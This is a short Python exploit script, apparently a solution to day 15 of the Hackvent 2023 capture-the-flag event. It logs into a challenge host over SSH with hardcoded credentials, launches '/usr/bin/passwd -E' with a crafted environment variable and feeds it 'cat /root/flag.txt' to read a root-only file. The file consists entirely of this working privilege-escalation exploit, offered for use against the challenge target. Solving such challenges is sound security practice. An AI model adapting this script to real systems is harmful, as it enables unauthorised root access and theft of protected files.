Hackvent_2023/Day 15/exploit.py

17 lines
591 B
Python

import paramiko
HOSTNAME = "04806b1a-dd1f-4eaf-b19d-b6df4db1cce5.rdocker.vuln.land"
USERNAME = "challenge"
PASSWORD = "challenge"
if __name__ == "__main__":
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(HOSTNAME, 22, USERNAME, PASSWORD)
stdin, stdout, stderr = ssh.exec_command("SALAMI=https://www.youtube.com/watch?v=dQw4w9WgXcQ /usr/bin/passwd -E")
stdin.write(b"cat /root/flag.txt\n")
stdin.flush()
stdin.close()
flag = stdout.read().split(b"\n")[0].decode()
print("[+] Flag:", flag)
ssh.close()